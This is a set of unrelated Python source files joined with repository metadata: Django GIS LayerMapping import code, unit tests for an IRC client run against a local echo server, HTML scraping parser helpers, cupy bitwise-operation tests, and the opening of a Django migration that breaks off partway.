    # OGR geometry type number (1=Point, 2=LineString, 3=Polygon).
    MULTI_TYPES = {1 : OGRGeomType('MultiPoint'),
                   2 : OGRGeomType('MultiLineString'),
                   3 : OGRGeomType('MultiPolygon'),
                   }

    # Acceptable Django field types and corresponding acceptable OGR
    # counterparts.
    FIELD_TYPES = {
        models.AutoField : OFTInteger,
        models.IntegerField : (OFTInteger, OFTReal, OFTString),
        models.FloatField : (OFTInteger, OFTReal),
        models.DateField : OFTDate,
        models.DateTimeField : OFTDateTime,
        models.EmailField : OFTString,
        models.TimeField : OFTTime,
        models.DecimalField : (OFTInteger, OFTReal),
        models.CharField : OFTString,
        models.SlugField : OFTString,
        models.TextField : OFTString,
        models.URLField : OFTString,
        models.USStateField : OFTString,
        models.XMLField : OFTString,
        models.SmallIntegerField : (OFTInteger, OFTReal, OFTString),
        models.PositiveSmallIntegerField : (OFTInteger, OFTReal, OFTString),
        }

    # The acceptable transaction modes, mapping the keyword string to the
    # Django transaction decorator used to wrap the save loop.
    TRANSACTION_MODES = {'autocommit' : transaction.autocommit,
                         'commit_on_success' : transaction.commit_on_success,
                         }

    def __init__(self, model, data, mapping, layer=0,
                 source_srs=None, encoding=None,
                 transaction_mode='commit_on_success',
                 transform=True, unique=None):
        """
        A LayerMapping object is initialized using the given Model (not an instance),
        a DataSource (or string path to an OGR-supported data file), and a mapping
        dictionary.  See the module level docstring for more details and keyword
        argument usage.
        """
        # Getting the DataSource and the associated Layer.
        if isinstance(data, basestring):
            self.ds = DataSource(data)
        else:
            self.ds = data
        self.layer = self.ds[layer]

        # Setting the mapping
        self.mapping = mapping

        # Setting the model, and getting the geometry column associated
        # with the model (an exception will be raised if there is no
        # geometry column).
        self.model = model
        self.geo_col = self.geometry_column()

        # Checking the source spatial reference system, and getting
        # the coordinate transformation object (unless the `transform`
        # keyword is set to False)
        if transform:
            self.source_srs = self.check_srs(source_srs)
            self.transform = self.coord_transform()
        else:
            # `self.transform` doubles as the CoordTransform object or False.
            self.transform = transform

        # Checking the layer -- initialization of the object will fail if
        # things don't check out before hand.
        self.check_layer()

        # Setting the encoding for OFTString fields, if specified.
        if encoding:
            # Making sure the encoding exists, if not a LookupError
            # exception will be thrown.
            from codecs import lookup
            lookup(encoding)
            self.encoding = encoding
        else:
            self.encoding = None

        if unique:
            self.check_unique(unique)
            transaction_mode = 'autocommit' # Has to be set to autocommit.
            self.unique = unique
        else:
            self.unique = None

        # Setting the transaction decorator with the function in the
        # transaction modes dictionary.
        if transaction_mode in self.TRANSACTION_MODES:
            self.transaction_decorator = self.TRANSACTION_MODES[transaction_mode]
            self.transaction_mode = transaction_mode
        else:
            raise LayerMapError('Unrecognized transaction mode: %s' % transaction_mode)

    #### Checking routines used during initialization ####
    def check_fid_range(self, fid_range):
        "This checks the `fid_range` keyword; returns a slice or None."
        if fid_range:
            if isinstance(fid_range, (tuple, list)):
                return slice(*fid_range)
            elif isinstance(fid_range, slice):
                return fid_range
            else:
                # Any other truthy type is rejected outright.
                raise TypeError
        else:
            return None

    def check_layer(self):
        """
        This checks the Layer metadata, and ensures that it is compatible
        with the mapping information and model.  Unlike previous revisions,
        there is no need to increment through each feature in the Layer.
        """
        # The geometry field of the model is set here.
        # TODO: Support more than one geometry field / model.
        self.geom_field = False
        self.fields = {}

        # Getting lists of the field names and the field types available in
        # the OGR Layer.
        ogr_fields = self.layer.fields
        ogr_field_types = self.layer.field_types

        # Function for determining if the OGR mapping field is in the Layer.
        def check_ogr_fld(ogr_map_fld):
            try:
                idx = ogr_fields.index(ogr_map_fld)
            except ValueError:
                raise LayerMapError('Given mapping OGR field "%s" not found in OGR Layer.' % ogr_map_fld)
            return idx

        # No need to increment through each feature in the model, simply check
        # the Layer metadata against what was given in the mapping dictionary.
        for field_name, ogr_name in self.mapping.items():
            # Ensuring that a corresponding field exists in the model
            # for the given field name in the mapping.
            try:
                model_field = self.model._meta.get_field(field_name)
            except models.fields.FieldDoesNotExist:
                raise LayerMapError('Given mapping field "%s" not in given Model fields.' % field_name)

            # Getting the string name for the Django field class (e.g., 'PointField').
            fld_name = model_field.__class__.__name__

            if isinstance(model_field, GeometryField):
                if self.geom_field:
                    raise LayerMapError('LayerMapping does not support more than one GeometryField per model.')

                try:
                    gtype = OGRGeomType(ogr_name)
                except OGRException:
                    raise LayerMapError('Invalid mapping for GeometryField "%s".' % field_name)

                # Making sure that the OGR Layer's Geometry is compatible.
                ltype = self.layer.geom_type
                if not (gtype == ltype or self.make_multi(ltype, model_field)):
                    raise LayerMapError('Invalid mapping geometry; model has %s, feature has %s.' % (fld_name, gtype))

                # Setting the `geom_field` attribute w/the name of the model field
                # that is a Geometry.
                self.geom_field = field_name
                fields_val = model_field
            elif isinstance(model_field, models.ForeignKey):
                if isinstance(ogr_name, dict):
                    # Is every given related model mapping field in the Layer?
                    rel_model = model_field.rel.to
                    for rel_name, ogr_field in ogr_name.items():
                        idx = check_ogr_fld(ogr_field)
                        try:
                            rel_field = rel_model._meta.get_field(rel_name)
                        except models.fields.FieldDoesNotExist:
                            raise LayerMapError('ForeignKey mapping field "%s" not in %s fields.' %
                                                (rel_name, rel_model.__class__.__name__))
                    # The related model itself (not a field) is stored as the
                    # mapping value; `feature_kwargs` dispatches on this.
                    fields_val = rel_model
                else:
                    raise TypeError('ForeignKey mapping must be of dictionary type.')
            else:
                # Is the model field type supported by LayerMapping?
                if not model_field.__class__ in self.FIELD_TYPES:
                    raise LayerMapError('Django field type "%s" has no OGR mapping (yet).' % fld_name)

                # Is the OGR field in the Layer?
                idx = check_ogr_fld(ogr_name)
                ogr_field = ogr_field_types[idx]

                # Can the OGR field type be mapped to the Django field type?
                if not issubclass(ogr_field, self.FIELD_TYPES[model_field.__class__]):
                    raise LayerMapError('OGR field "%s" (of type %s) cannot be mapped to Django %s.' %
                                        (ogr_field, ogr_field.__name__, fld_name))
                fields_val = model_field

            self.fields[field_name] = fields_val

    def check_srs(self, source_srs):
        "Checks the compatibility of the given spatial reference object."
        if isinstance(source_srs, SpatialReference):
            sr = source_srs
        elif isinstance(source_srs, SpatialRefSys):
            sr = source_srs.srs
        elif isinstance(source_srs, (int, basestring)):
            sr = SpatialReference(source_srs)
        else:
            # Otherwise just pulling the SpatialReference from the layer
            sr = self.layer.srs

        if not sr:
            raise LayerMapError('No source reference system defined.')
        else:
            return sr

    def check_unique(self, unique):
        "Checks the `unique` keyword parameter -- may be a sequence or string."
        if isinstance(unique, (list, tuple)):
            # List of fields to determine uniqueness with
            for attr in unique:
                if not attr in self.mapping: raise ValueError
        elif isinstance(unique, basestring):
            # Only a single field passed in.
            if unique not in self.mapping: raise ValueError
        else:
            raise TypeError('Unique keyword argument must be set with a tuple, list, or string.')

    #### Keyword argument retrieval routines ####
    def feature_kwargs(self, feat):
        """
        Given an OGR Feature, this will return a dictionary of keyword arguments
        for constructing the mapped model.
        """
        # The keyword arguments for model construction.
        kwargs = {}

        # Incrementing through each model field and OGR field in the
        # dictionary mapping.
        for field_name, ogr_name in self.mapping.items():
            model_field = self.fields[field_name]

            if isinstance(model_field, GeometryField):
                # Verify OGR geometry.
                val = self.verify_geom(feat.geom, model_field)
            elif isinstance(model_field, models.base.ModelBase):
                # The related _model_, not a field was passed in -- indicating
                # another mapping for the related Model.
                val = self.verify_fk(feat, model_field, ogr_name)
            else:
                # Otherwise, verify OGR Field type.
                val = self.verify_ogr_field(feat[ogr_name], model_field)

            # Setting the keyword arguments for the field name with the
            # value obtained above.
            kwargs[field_name] = val

        return kwargs

    def unique_kwargs(self, kwargs):
        """
        Given the feature keyword arguments (from `feature_kwargs`) this routine
        will construct and return the uniqueness keyword arguments -- a subset
        of the feature kwargs.
        """
        if isinstance(self.unique, basestring):
            return {self.unique : kwargs[self.unique]}
        else:
            return dict((fld, kwargs[fld]) for fld in self.unique)

    #### Verification routines used in constructing model keyword arguments. ####
    def verify_ogr_field(self, ogr_field, model_field):
        """
        Verifies if the OGR Field contents are acceptable to the Django
        model field.  If they are, the verified value is returned,
        otherwise the proper exception is raised.
        """
        if (isinstance(ogr_field, OFTString) and
            isinstance(model_field, (models.CharField, models.TextField))):
            if self.encoding:
                # The encoding for OGR data sources may be specified here
                # (e.g., 'cp437' for Census Bureau boundary files).
                val = unicode(ogr_field.value, self.encoding)
            else:
                val = ogr_field.value
                if len(val) > model_field.max_length:
                    raise InvalidString('%s model field maximum string length is %s, given %s characters.' %
                                        (model_field.name, model_field.max_length, len(val)))
        elif isinstance(ogr_field, OFTReal) and isinstance(model_field, models.DecimalField):
            try:
                # Creating an instance of the Decimal value to use.
                d = Decimal(str(ogr_field.value))
            except:
                raise InvalidDecimal('Could not construct decimal from: %s' % ogr_field.value)

            # Getting the decimal value as a tuple.
            dtup = d.as_tuple()
            digits = dtup[1]
            d_idx = dtup[2] # index where the decimal is

            # Maximum amount of precision, or digits to the left of the decimal.
            max_prec = model_field.max_digits - model_field.decimal_places

            # Getting the digits to the left of the decimal place for the
            # given decimal.
            if d_idx < 0:
                n_prec = len(digits[:d_idx])
            else:
                n_prec = len(digits) + d_idx

            # If we have more than the maximum digits allowed, then throw an
            # InvalidDecimal exception.
            if n_prec > max_prec:
                raise InvalidDecimal('A DecimalField with max_digits %d, decimal_places %d must round to an absolute value less than 10^%d.' %
                                     (model_field.max_digits, model_field.decimal_places, max_prec))
            val = d
        elif isinstance(ogr_field, (OFTReal, OFTString)) and isinstance(model_field, models.IntegerField):
            # Attempt to convert any OFTReal and OFTString value to an OFTInteger.
            try:
                val = int(ogr_field.value)
            except:
                raise InvalidInteger('Could not construct integer from: %s' % ogr_field.value)
        else:
            val = ogr_field.value
        return val

    def verify_fk(self, feat, rel_model, rel_mapping):
        """
        Given an OGR Feature, the related model and its dictionary mapping,
        this routine will retrieve the related model for the ForeignKey
        mapping.
        """
        # TODO: It is expensive to retrieve a model for every record --
        #  explore if an efficient mechanism exists for caching related
        #  ForeignKey models.

        # Constructing and verifying the related model keyword arguments.
        fk_kwargs = {}
        for field_name, ogr_name in rel_mapping.items():
            fk_kwargs[field_name] = self.verify_ogr_field(feat[ogr_name], rel_model._meta.get_field(field_name))

        # Attempting to retrieve and return the related model.
        try:
            return rel_model.objects.get(**fk_kwargs)
        except ObjectDoesNotExist:
            raise MissingForeignKey('No ForeignKey %s model found with keyword arguments: %s' % (rel_model.__name__, fk_kwargs))

    def verify_geom(self, geom, model_field):
        """
        Verifies the geometry -- will construct and return a GeometryCollection
        if necessary (for example if the model field is MultiPolygonField while
        the mapped shapefile only contains Polygons).
        """
        if self.make_multi(geom.geom_type, model_field):
            # Constructing a multi-geometry type to contain the single geometry
            multi_type = self.MULTI_TYPES[geom.geom_type.num]
            g = OGRGeometry(multi_type)
            g.add(geom)
        else:
            g = geom

        # Transforming the geometry with our Coordinate Transformation object,
        # but only if the class variable `transform` is set w/a CoordTransform
        # object.
        if self.transform: g.transform(self.transform)

        # Returning the WKT of the geometry.
        return g.wkt

    #### Other model methods ####
    def coord_transform(self):
        "Returns the coordinate transformation object."
        try:
            # Getting the target spatial reference system
            target_srs = SpatialRefSys.objects.get(srid=self.geo_col.srid).srs

            # Creating the CoordTransform object
            return CoordTransform(self.source_srs, target_srs)
        except Exception, msg:
            raise LayerMapError('Could not translate between the data source and model geometry: %s' % msg)

    def geometry_column(self):
        "Returns the GeometryColumn model associated with the geographic column."
        # Getting the GeometryColumn object.
        try:
            db_table = self.model._meta.db_table
            # Oracle stores table names upper-cased in its metadata views.
            if SpatialBackend.name == 'oracle': db_table = db_table.upper()
            gc_kwargs = {GeometryColumns.table_name_col() : db_table}
            return GeometryColumns.objects.get(**gc_kwargs)
        except Exception, msg:
            raise LayerMapError('Geometry column does not exist for model. (did you run syncdb?):\n %s' % msg)

    def make_multi(self, geom_type, model_field):
        """
        Given the OGRGeomType for a geometry and its associated GeometryField,
        determine whether the geometry should be turned into a GeometryCollection.
        """
        return (geom_type.num in self.MULTI_TYPES and
                model_field.__class__.__name__ == 'Multi%s' % geom_type.django)

    def save(self, verbose=False, fid_range=False, step=False,
             progress=False, silent=False, stream=sys.stdout, strict=False):
        """
        Saves the contents from the OGR DataSource Layer into the database
        according to the mapping dictionary given at initialization.

        Keyword Parameters:
         verbose:
           If set, information will be printed subsequent to each model save
           executed on the database.

         fid_range:
           May be set with a slice or tuple of (begin, end) feature ID's to map
           from the data source.  In other words, this keyword enables the user
           to selectively import a subset range of features in the geographic
           data source.

         step:
           If set with an integer, transactions will occur at every step
           interval. For example, if step=1000, a commit would occur after
           the 1,000th feature, the 2,000th feature etc.

         progress:
           When this keyword is set, status information will be printed giving
           the number of features processed and successfully saved.  By default,
           progress information will be printed every 1000 features processed,
           however, this default may be overridden by setting this keyword with an
           integer for the desired interval.

         stream:
           Status information will be written to this file handle.  Defaults to
           using `sys.stdout`, but any object with a `write` method is supported.

         silent:
           By default, non-fatal error notifications are printed to stdout, but
           this keyword may be set to disable these notifications.

         strict:
           Execution of the model mapping will cease upon the first error
           encountered.  The default behavior is to attempt to continue.
        """
        # Getting the default Feature ID range.
        default_range = self.check_fid_range(fid_range)

        # Setting the progress interval, if requested.
        if progress:
            if progress is True or not isinstance(progress, int):
                progress_interval = 1000
            else:
                progress_interval = progress

        # Defining the 'real' save method, utilizing the transaction
        # decorator created during initialization.
        @self.transaction_decorator
        def _save(feat_range=default_range, num_feat=0, num_saved=0):
            if feat_range:
                layer_iter = self.layer[feat_range]
            else:
                layer_iter = self.layer

            for feat in layer_iter:
                num_feat += 1
                # Getting the keyword arguments
                try:
                    kwargs = self.feature_kwargs(feat)
                except LayerMapError, msg:
                    # Something borked the validation
                    if strict: raise
                    elif not silent:
                        stream.write('Ignoring Feature ID %s because: %s\n' % (feat.fid, msg))
                else:
                    # Constructing the model using the keyword args
                    is_update = False
                    if self.unique:
                        # If we want unique models on a particular field, handle the
                        # geometry appropriately.
                        try:
                            # Getting the keyword arguments and retrieving
                            # the unique model.
                            u_kwargs = self.unique_kwargs(kwargs)
                            m = self.model.objects.get(**u_kwargs)
                            is_update = True

                            # Getting the geometry (in OGR form), creating
                            # one from the kwargs WKT, adding in additional
                            # geometries, and update the attribute with the
                            # just-updated geometry WKT.
                            geom = getattr(m, self.geom_field).ogr
                            new = OGRGeometry(kwargs[self.geom_field])
                            for g in new: geom.add(g)
                            setattr(m, self.geom_field, geom.wkt)
                        except ObjectDoesNotExist:
                            # No unique model exists yet, create.
                            m = self.model(**kwargs)
                    else:
                        m = self.model(**kwargs)

                    try:
                        # Attempting to save.
                        m.save()
                        num_saved += 1
                        if verbose: stream.write('%s: %s\n' % (is_update and 'Updated' or 'Saved', m))
                    except SystemExit:
                        raise
                    except Exception, msg:
                        if self.transaction_mode == 'autocommit':
                            # Rolling back the transaction so that other model saves
                            # will work.
                            transaction.rollback_unless_managed()
                        if strict:
                            # Bailing out if the `strict` keyword is set.
                            if not silent:
                                stream.write('Failed to save the feature (id: %s) into the model with the keyword arguments:\n' % feat.fid)
                                stream.write('%s\n' % kwargs)
                            raise
                        elif not silent:
                            stream.write('Failed to save %s:\n %s\nContinuing\n' % (kwargs, msg))

                # Printing progress information, if requested.
                if progress and num_feat % progress_interval == 0:
                    stream.write('Processed %d features, saved %d ...\n' % (num_feat, num_saved))

            # Only used for status output purposes -- incremental saving uses the
            # values returned here.
            return num_saved, num_feat

        nfeat = self.layer.num_feat
        if step and isinstance(step, int) and step < nfeat:
            # Incremental saving is requested at the given interval (step)
            if default_range:
                raise LayerMapError('The `step` keyword may not be used in conjunction with the `fid_range` keyword.')
            beg, num_feat, num_saved = (0, 0, 0)
            indices = range(step, nfeat, step)
            n_i = len(indices)

            for i, end in enumerate(indices):
                # Constructing the slice to use for this step; the last slice is
                # special (e.g, [100:] instead of [90:100]).
                if i+1 == n_i: step_slice = slice(beg, None)
                else: step_slice = slice(beg, end)

                try:
                    num_feat, num_saved = _save(step_slice, num_feat, num_saved)
                    beg = end
                except:
                    stream.write('%s\nFailed to save slice: %s\n' % ('=-' * 20, step_slice))
                    raise
        else:
            # Otherwise, just calling the previously defined _save() function.
            _save()
| {
"content_hash": "796213135201c47156cf05d098a77560",
"timestamp": "",
"source": "github",
"line_count": 676,
"max_line_length": 142,
"avg_line_length": 44.01627218934911,
"alnum_prop": 0.592135775499916,
"repo_name": "Shrews/PyGerrit",
"id": "40d2e97278459f5bde964f1b8eb1196bfd6f338b",
"size": "29814",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "webapp/django/contrib/gis/utils/layermapping.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Java",
"bytes": "157968"
},
{
"name": "JavaScript",
"bytes": "181665"
},
{
"name": "Python",
"bytes": "3224616"
},
{
"name": "Shell",
"bytes": "6903"
}
],
"symlink_target": ""
} |
"""
Copyright (c) 2014 Dan Obermiller
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
You should have received a copy of the MIT License along with this program.
If not, see <http://opensource.org/licenses/MIT>
"""
try:
import cStringIO as IO
except ImportError:
import StringIO as IO
finally:
from contextlib import closing, contextmanager
import select
import socket
import sys
import threading
import time
import unittest
from testfixtures import LogCapture
import IRC_sockselect as IRC
@contextmanager
def capture():
    """Temporarily swap sys.stdout/sys.stderr for in-memory buffers.

    Yields a two-element list [stdout_buffer, stderr_buffer]. On exit the
    real streams are restored and each slot of the yielded list is replaced
    by the text that was captured.
    """
    saved_streams = (sys.stdout, sys.stderr)
    captured = [IO.StringIO(), IO.StringIO()]
    try:
        sys.stdout, sys.stderr = captured
        yield captured
    finally:
        sys.stdout, sys.stderr = saved_streams
        captured[0] = captured[0].getvalue()
        captured[1] = captured[1].getvalue()
def client_thread(client_socket, client_event):
    """Per-connection echo worker for ServerSocket.

    Echoes every received message back to the client until either a
    socket error occurs or a message containing 'Done' arrives; in both
    cases the socket is closed and client_event is set so the server
    can reap this thread.
    """
    while not client_event.isSet():
        # Block until the socket is readable.
        ready, _, _ = select.select([client_socket],
                                    [],
                                    [])
        if ready:
            try:
                message = client_socket.recv(1024)
            except socket.error:
                ## Takes care of race conditions due to test_leave_server
                client_socket.close()
                client_event.set()
            else:
                if 'Done' in message:
                    # Sentinel from the tests: stop serving this client.
                    client_socket.close()
                    client_event.set()
                else:
                    # Echo the message back unchanged.
                    client_socket.send(message)
    return
class ServerSocket(threading.Thread):
    """Minimal TCP echo server used as a stand-in IRC server by the tests.

    Accepts connections on (hostname, port) in a background thread and
    spawns one client_thread per connection; finished client threads are
    joined and forgotten. Set ``self.event`` to request shutdown.
    """
    def __init__(self, hostname='localhost', port=10000, timeout=100000):
        super(ServerSocket, self).__init__()
        self.hostname = hostname
        self.port = port
        self.timeout = timeout  # NOTE(review): stored but not used below
        self.now = time.time()  # creation timestamp; not used below
        self.event = threading.Event()  # set to stop the accept loop
        # Maps from a thread ID to a tuple of form
        # (socket, threading.Event, threading.Thread)
        self.clients = {}
    def run(self):
        with closing(socket.socket(socket.AF_INET,
                                   socket.SOCK_STREAM)) as self.server:
            self.server.bind((self.hostname, self.port))
            self.server.listen(5)
            while not self.event.isSet():
                # accept() blocks, so the stop event is only noticed after
                # the next connection comes in.
                connection, _ = self.server.accept()
                if connection:
                    event = threading.Event()
                    client = threading.Thread(target=client_thread,
                                              args=(connection,
                                                    event))
                    client.start()
                    self.clients[client.ident] = connection, event, client
                # Reap client threads that have signalled completion.
                # NOTE(review): deleting while iterating items() is only safe
                # on Python 2, where items() returns a list — confirm target.
                for id_, (socket_, event_, client_) in self.clients.items():
                    if event_.isSet():
                        client_.join()
                        del self.clients[id_]
class test_sockselect(unittest.TestCase):
    """
    Integration tests for IRC_sockselect.IRC_member, run against the local
    ServerSocket echo server defined above. Each API under test is expected
    to return 0 on success.
    """
    @classmethod
    def setUpClass(cls):
        # One echo server (and one log capture) shared by every test.
        cls.server = ServerSocket()
        cls.server.start()
        cls.log_capture = LogCapture()
    @classmethod
    def tearDownClass(cls):
        # Ask the accept loop to stop, then wait for the server thread.
        cls.server.event.set()
        cls.server.join()
        cls.log_capture.uninstall()
    def setUp(self):
        # Fresh IRC member per test.
        self.IRC_ = IRC.IRC_member("Nickname")
    def tearDown(self):
        # 'Done' tells the per-connection client_thread to close the socket.
        for server in self.IRC_.servers:
            self.IRC_.send_server_message(server, 'Done')
    def test_join_server(self):
        # With only host/port, nick/ident/realname default to the nickname.
        self.assertEqual(self.IRC_.join_server('localhost',
                                               10000),
                         0)
        # NOTE(review): map() is lazy on Python 3 — these assertions only
        # execute eagerly under Python 2.
        map(self.assertEqual,
            [self.IRC_.nick, self.IRC_.ident, self.IRC_.realname],
            ['Nickname']*3
            )
    def test_join_server2(self):
        # Explicit nick/ident/realname are stored per server.
        self.assertEqual(self.IRC_.join_server('localhost',
                                               port=10000,
                                               nick="Nick",
                                               ident="Ident",
                                               realname="Realname"),
                         0)
        map(self.assertEqual,
            [self.IRC_.serv_to_data['localhost']['nick'],
             self.IRC_.serv_to_data['localhost']['ident'],
             self.IRC_.serv_to_data['localhost']['realname'],
             ],
            ['Nick', 'Ident', 'Realname']
            )
    def test_leave_server(self):
        self.IRC_.join_server('localhost', 10000)
        self.assertEqual(self.IRC_.leave_server('localhost'),
                         0)
    def test_join_channel(self):
        self.IRC_.join_server('localhost', 10000)
        self.assertEqual(self.IRC_.join_channel('localhost',
                                                '#temp-channel'),
                         0)
    def test_leave_channel(self):
        self.IRC_.join_server('localhost', 10000)
        self.IRC_.join_channel('localhost', '#tchannel')
        self.assertEqual(self.IRC_.leave_channel('localhost', '#tchannel'), 0)
    def test_send_server_message(self):
        self.IRC_.join_server('localhost', 10000)
        self.assertEqual(self.IRC_.send_server_message('localhost',
                                                       'anything'),
                         0)
    def test_send_channel_message(self):
        self.IRC_.join_server('localhost', 10000)
        self.IRC_.join_channel('localhost', '#temp-channel')
        self.assertEqual(self.IRC_.send_channel_message('localhost',
                                                        '#temp-channel',
                                                        'anything'),
                         0)
    def test_send_priv_message(self):
        self.IRC_.join_server('localhost', 10000)
        self.assertEqual(self.IRC_.send_privmsg('localhost',
                                                'some_user',
                                                'anything'),
                         0)
    def test_receive_all_messages(self):
        self.IRC_.replies['localhost'] = []
        self.IRC_.join_server('localhost', 10000)
        map(self.IRC_.send_server_message,
            ['localhost']*3,
            ['whatever', 'something else', 'last thing'])
        # Suppress whatever receive_all_messages() prints.
        with capture():
            self.assertEqual(self.IRC_.receive_all_messages(), 0)
    def test_receive_message(self):
        self.IRC_.replies['localhost'] = []
        self.IRC_.join_server('localhost', 10000)
        map(self.IRC_.send_server_message,
            ['localhost']*3,
            ['whatever', 'something else', 'last thing'])
        self.IRC_.receive_message(('localhost',))
        # The echo server reflects everything, including the NICK/USER
        # handshake that join_server sent first.
        self.assertEqual(self.IRC_.replies['localhost'],
                         [
                          'NICK Nickname',
                          'USER Nickname Nickname bla: Nickname',
                          'whatever',
                          'something else',
                          'last thing'
                          ]
                         )
if __name__ == '__main__':
    # Build a suite from the TestCase above and run it, reporting to stdout.
    suite = unittest.TestLoader().loadTestsFromTestCase(test_sockselect)
    unittest.TextTestRunner(sys.stdout, verbosity=1).run(suite)
| {
"content_hash": "2d271407b004d9b651240f96ea2bded0",
"timestamp": "",
"source": "github",
"line_count": 223,
"max_line_length": 78,
"avg_line_length": 37.34080717488789,
"alnum_prop": 0.5240782995076257,
"repo_name": "Dannnno/PyIRC",
"id": "3e100680aa8df065ac9cf8e71cf5dfcdff642656",
"size": "8327",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Testing/test_sockselect.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34282"
}
],
"symlink_target": ""
} |
from decimal import Decimal, InvalidOperation
from datetime import datetime
import iso8601
def string(els):
    """Return stripped text from *els*.

    Accepts either a plain string (returned stripped) or an iterable of
    lxml-style elements, whose ``text_content()`` values are stripped and
    concatenated.
    """
    # ``basestring`` only exists on Python 2; fall back to ``str`` so this
    # helper also works on Python 3 without changing Python 2 behavior.
    try:
        text_types = basestring
    except NameError:
        text_types = str
    if isinstance(els, text_types):
        return els.strip()
    return ''.join(el.text_content().strip() for el in els)
def integer_single(s):
    """Parse one integer token, ignoring surrounding space and commas."""
    cleaned = s.strip().replace(',', '')
    return int(cleaned)
def integer(els):
    """Return the first whitespace-separated chunk of *els* that parses
    as an integer; raise ValueError if none does."""
    text = string(els)
    for token in text.split():
        try:
            return integer_single(token)
        except ValueError:
            continue
    raise ValueError("couldn't find an integer in: %r" % text)
def calendar_date(els):
    """Parse a date like 'Jan 02, 2014' from *els* into a datetime."""
    return datetime.strptime(string(els), '%b %d, %Y')
def isodate(els):
    """Parse an ISO-8601 timestamp from *els*."""
    return iso8601.parse_date(string(els))
def currency_single(s):
    """Parse one currency token like '$1,234.50' into (units, Decimal).

    Recognizes a leading '$' (usd) or pound sign (gbp); raises ValueError
    for any other prefix or an unparseable amount.
    """
    token = s.strip()
    prefixes = {'$': 'usd', u'\xa3': 'gbp'}
    for symbol, units in prefixes.items():
        if token.startswith(symbol):
            amount = token[len(symbol):].replace(',', '')
            try:
                return units, Decimal(amount)
            except InvalidOperation:
                raise ValueError("couldn't convert to currency")
    raise ValueError("doesn't start with a currency symbol")
def currency(els):
    """Return the first whitespace-separated chunk of *els* that parses
    as a currency amount; raise ValueError if none does."""
    text = string(els)
    for token in text.split():
        try:
            return currency_single(token)
        except ValueError:
            continue
    raise ValueError("couldn't find a currency in: %r" % text)
def href(els):
    """Return the ``href`` attribute of the single element in *els*;
    raise ValueError unless exactly one element was given."""
    if len(els) != 1:
        raise ValueError("got wrong # of elements for href: %r" % els)
    return els[0].attrib['href']
def hrefs(els):
    """Return the ``href`` attribute of every element in *els*."""
    def _get_href(el):
        return el.attrib['href']
    return list(map(_get_href, els))
| {
"content_hash": "1399a5abafcc4ead9043c5cd9e2054e6",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 70,
"avg_line_length": 21.36986301369863,
"alnum_prop": 0.5814102564102565,
"repo_name": "storborg/itsy",
"id": "ae9dd2eb730cf59fa260e4be74ad02f666da4336",
"size": "1560",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "itsy/parsers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "19659"
}
],
"symlink_target": ""
} |
import unittest
from cupy import testing
@testing.gpu
class TestElementwise(unittest.TestCase):
    """Check cupy's bitwise/shift ops agree with numpy on integer dtypes."""
    @testing.for_int_dtypes()
    @testing.numpy_cupy_array_equal()
    def check_unary_int(self, name, xp, dtype):
        # Fixed sample covering negative, zero and positive values.
        a = xp.array([-3, -2, -1, 0, 1, 2, 3], dtype=dtype)
        return getattr(xp, name)(a)
    @testing.for_int_dtypes()
    @testing.numpy_cupy_array_equal()
    def check_binary_int(self, name, xp, dtype):
        # Second operand is non-negative so shifts are well-defined.
        a = xp.array([-3, -2, -1, 0, 1, 2, 3], dtype=dtype)
        b = xp.array([0, 1, 2, 3, 4, 5, 6], dtype=dtype)
        return getattr(xp, name)(a, b)
    def test_bitwise_and(self):
        self.check_binary_int('bitwise_and')
    def test_bitwise_or(self):
        self.check_binary_int('bitwise_or')
    def test_bitwise_xor(self):
        self.check_binary_int('bitwise_xor')
    def test_invert(self):
        self.check_unary_int('invert')
    def test_left_shift(self):
        self.check_binary_int('left_shift')
    def test_right_shift(self):
        self.check_binary_int('right_shift')
| {
"content_hash": "ece0e737db44ecacef958c5ed3a4c95a",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 59,
"avg_line_length": 27.342105263157894,
"alnum_prop": 0.6073147256977863,
"repo_name": "cupy/cupy",
"id": "eca12f948b75ed6f5188113081037743abcf173b",
"size": "1039",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/cupy_tests/binary_tests/test_elementwise.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "38"
},
{
"name": "C",
"bytes": "712019"
},
{
"name": "C++",
"bytes": "895316"
},
{
"name": "Cuda",
"bytes": "151799"
},
{
"name": "Cython",
"bytes": "1996454"
},
{
"name": "Dockerfile",
"bytes": "40251"
},
{
"name": "PowerShell",
"bytes": "7361"
},
{
"name": "Python",
"bytes": "4841354"
},
{
"name": "Shell",
"bytes": "24521"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Alters two googlecalendar plugin fields: makes the CASCADE behavior of
    # the CMSPlugin parent link explicit, and adds help text / blank=True
    # to the hex colour field.
    dependencies = [
        ('djangocms_googlecalendar', '0002_googlecalendar_title'),
    ]
    operations = [
        migrations.AlterField(
            model_name='googlecalendar',
            name='cmsplugin_ptr',
